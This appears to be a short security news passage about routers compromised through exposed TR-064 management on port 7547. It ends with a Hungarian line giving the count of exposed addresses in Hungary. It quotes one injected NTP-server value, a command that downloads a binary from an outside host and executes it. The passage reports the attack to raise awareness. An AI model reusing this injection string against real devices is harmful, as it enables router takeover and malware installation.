The router rebooted every 15 to 20 minutes. The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely:
cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2
The ISPs of the entire world have the need to manage their infrastructure – in particular your modems or routers.
One of those protocols is called TR-064, also know as LAN-Side DSL CPE Configuration
On some modems and routers TR-064 is publicly available to the outside world. It means that any internet user can command those devices to for example change DNS or NTP settings.
Magyarországon 176157 IP esetében érhető el az Internet felől az érintett 7547-es port.